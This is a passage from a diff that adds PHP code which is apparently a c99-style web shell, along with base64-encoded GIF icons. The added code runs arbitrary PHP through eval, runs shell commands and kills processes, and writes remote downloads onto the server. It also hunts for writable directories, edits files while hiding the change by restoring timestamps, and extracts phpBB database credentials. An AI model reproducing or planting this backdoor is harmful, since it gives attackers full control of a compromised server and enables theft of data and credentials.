H:i:s",$a[2]); + if (!$win) { $row[] = $a[3]; } + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Edit\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table 
+ $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+ echo "
        .: ";
+ if (!empty($dQ_infohead)) { echo $dQ_infohead; }
+ else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+ echo " :.
        \n"; + echo "
        ". + ""; + foreach($table as $row) { + echo ""; + foreach($row as $v) {echo "";} + echo "\r\n"; + } + echo "
        ".$v."
        ". + "". + "
        ". + "  ". + ""; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { + echo "                  "; + } + echo " 
        "; + echo "
        "; + } +} +if ($act == "tools") { tools(); } +##[ PHP FILESYSTEM TRICKZ (By diKi) ]## +if ($act == "phpfsys") { + echo "
        "; + $fsfunc = $phpfsysfunc; + if ($fsfunc=="copy") { + if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";} + else { echo "Success! $arg1 copied to $arg2\n"; } + } + elseif ($fsfunc=="rename") { + if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";} + else { echo "Success! $arg1 renamed/moved to $arg2\n"; } + } + elseif ($fsfunc=="chmod") { + if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";} + else { echo "Perm for $arg1 changed to $arg2!\n"; } + } + elseif ($fsfunc=="read") { + $darg = $d.$arg1; + if ($hasil = @file_get_contents($darg)) { + echo "Filename: ".$darg."
        "; + echo "
        \n"; + } + else { echo "
        Couldn't open ".$darg."
        "; } + } + elseif ($fsfunc=="write") { + $darg = $d.$arg1; + if(@file_put_contents($darg,$arg2)) { + echo "Saved! ".$darg; + + } + else { echo "
        Can't write to $darg!
        "; } + } + elseif ($fsfunc=="downloadbin") { + $handle = fopen($arg1, "rb"); + $contents = ''; + while (!feof($handle)) { + $contents .= fread($handle, 8192); + } + $r = @fopen($d.$arg2,'w'); + if (fwrite($r,$contents)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } + else { echo "
        Can't write to ".$d.$arg2."!
        "; } + fclose($r); + fclose($handle); + } + elseif ($fsfunc=="download") { + $text = implode('', file($arg1)); + if ($text) { + $r = @fopen($d.$arg2,'w'); + if (fwrite($r,$text)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } + else { echo "
        Can't write to ".$d.$arg2."!
        "; } + fclose($r); + } + else { echo "
        Can't download from $arg1!
        ";} + } + elseif ($fsfunc=='mkdir') { + $thedir = $d.$arg1; + if ($thedir != $d) { + if (file_exists($thedir)) { echo "Already exists: ".htmlspecialchars($thedir); } + elseif (!mkdir($thedir)) { echo "Access denied: ".htmlspecialchars($thedir); } + else { echo "Dir created: ".htmlspecialchars($thedir);} + } + else { echo "Can't create current dir: $thedir"; } + } + elseif ($fsfunc=='fwritabledir') { + function recurse_dir($dir,$max_dir) { + global $dir_count; + $dir_count++; + if( $cdir = dir($dir) ) { + while( $entry = $cdir-> read() ) { + if( $entry != '.' && $entry != '..' ) { + if(is_dir($dir.$entry) && is_writable($dir.$entry) ) { + if ($dir_count > $max_dir) { return; } + echo "[".$dir_count."] ".$dir.$entry."\n"; + recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir); + } + } + } + $cdir->close(); + } + } + if (!$arg1) { $arg1 = $d; } + if (!$arg2) { $arg2 = 10; } + if (is_dir($arg1)) { + echo "Writable directories (Max: $arg2) in: $arg1
        "; + echo "
        ";
        +      recurse_dir($arg1,$arg2);
        +      echo "
        "; + $total = $dir_count - 1; + echo "
        Founds: ".$total." of Max $arg2";
+ }
+ else {
+ echo "
        Directory is not exist or permission denied!
        "; + } + } + else { + if (!$arg1) { echo "
        No operation! Please fill parameter [A]!
        \n"; } + else { + if ($hasil = $fsfunc($arg1)) { + echo "Result of $fsfunc $arg1:
        "; + if (!is_array($hasil)) { echo "$hasil\n"; } + else { + echo "
        ";
        +          foreach ($hasil as $v) { echo $v."\n"; }
        +          echo "
        "; + } + } + else { echo "
        $fsfunc $arg1 failed!
        \n"; } + } + } + echo "
        \n";
+}
+if ($act == "processes") {
+ echo "
        .: Processes :.
        \n"; + if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); } + else { $handler = "tasklist"; } + $ret = dQ99exec($handler); + if (!$ret) { echo "Can't execute \"".$handler."\"!"; } + else { + if (empty($processes_sort)) { $processes_sort = $sort_default; } + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") { + $y = ""; + } + else { + $y = ""; + } + $ret = htmlspecialchars($ret); + if (!$win) { //Not Windows + if ($pid) { + if (is_null($sig)) { $sig = 9; } + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; } + } + while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i].""; + } + } + $head[$i] = ""; + $prcs = array(); + foreach ($stack as $line) { + if (!empty($line)) { + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) { $line[0] = "".$line[0].""; } + $line[] = "KILL"; + $prcs[] = $line; + } + } + } + //For Windows - Fixed By diKi + else { + while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } + while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); } + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $stack[0]=str_replace("Image Name","ImageName",$stack[0]); + $stack[0]=str_replace("Session Name","SessionName",$stack[0]); + $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]); + $head = explode(" ",$stack[0]); + $stack = array_slice($stack,1); + $head = array_values($head); + if ($parsesort[1] != "a") { $y = ""; } + else { $y = ""; } + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i]).""; } + } + $prcs = array(); + 
unset($stack[0]); + foreach ($stack as $line) { + if (!empty($line)) { + $line = explode(" ",$line); + $line[4] = str_replace(".","",$line[4]); + $line[4] = intval($line[4]) * 1024; + unset($line[5]); + $prcs[] = $line; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); } + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "\n"; + foreach($tab as $i=>$k) { + echo ""; + foreach($k as $j=>$v) { + if ($win and $i > 0 and $j == 4) { $v = view_size($v); } + echo ""; + } + echo "\n"; + } + echo "
        ".$v."
        "; + } +} +if ($act == "eval") { + if (!empty($eval)) { + echo "Result of execution this PHP-code:
        "; + $tmp = @ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) { + @ob_clean(); + eval($eval); + $ret = @ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + @ob_clean(); + echo $tmp; + if ($eval_txt) { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
        "; + } + else {echo $ret."
        ";} + } + else { + if ($eval_txt) { + echo "
        "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "PHP-code Execution (Use without PHP Braces!)"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


         Display in text-area 
        "; +} +if ($act == "f") { + echo "
        "; + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { + if (file_exists($d.$f)) {echo "
        Permision denied (".htmlspecialchars($d.$f).")!
        ";} + else {echo "
        File does not exists (".htmlspecialchars($d.$f).")!
        Create
        ";} + } + else { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
        Select action/file-type:
        "; + foreach($arr as $t) { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
        "; + if ($ft == "info") { + echo "Information:"; + if (!$win) { + echo "
        Path ".$d.$f."
        Size ".view_size(filesize($d.$f))."
        MD5 ".md5_file($d.$f)."
        Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
        Perms".view_perms_color($d.$f)."
        Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
        Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
        MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."
        "; + $fi = fopen($d.$f,"rb"); + if ($fi) { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
        "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
        "; + $a2 .= "
        "; + } + } + echo "". + "". + "". + "". + "
        ".$a0."".$a1."".$a2."

        "; + } + $encoded = ""; + if ($base64 == 1) { + echo "Base64 Encode
        "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) { + echo "Base64 Encode + Chunk
        "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) { + echo "Base64 Encode + Chunk + Quotes
        "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
        "; + } + if (!empty($encoded)) + { + echo "

        "; + } + echo "HEXDUMP: [Full] [Preview]
        Base64: +
        [Encode + [+chunk + [+chunk+quotes + [Decode +

        "; + } + elseif ($ft == "html") { + if ($white) {@ob_clean();} + echo $r; + if ($white) {dQ99shexit();} + } + elseif ($ft == "txt") {echo "

        ".htmlspecialchars($r)."
        ";} + elseif ($ft == "ini") {echo "
        "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
        ";} + elseif ($ft == "phpsess") { + echo "
        ";
        +   $v = explode("|",$r);
        +   echo $v[0]."
        "; + var_dump(unserialize($v[1])); + echo "
        "; + } + elseif ($ft == "exe") { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

        Display in text-area
        "; + } + elseif ($ft == "sdb") {echo "
        "; var_dump(unserialize(base64_decode($r))); echo "
        ";} + elseif ($ft == "code") { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { + $arr = explode("\n",$r); + if (count($arr == 18)) { + include($d.$f); + echo "phpBB configuration is detected in this file!
        "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

        ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";} + echo "Parameters for manual connect:
        "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
        ";} + echo "

        "; + } + } + echo "
        "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {dQ99shexit();} + echo "
        "; + } + elseif ($ft == "download") { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") { + $inf = getimagesize($d.$f); + if (!$white) { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
        Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

        "; + } + else { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
          
        "; + } + elseif (!empty($ft)) {echo "
        Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
        ";} + else {echo "
        Unknown file type (".$ext."), please select type manually.
        ";} +} +echo "
        \n"; +} +} +else { +@ob_clean(); +$images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGdQChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1dQ19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9dQ7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9dQ////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9dQ01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9dQ01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++dQ/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/dQ6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5dQ4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
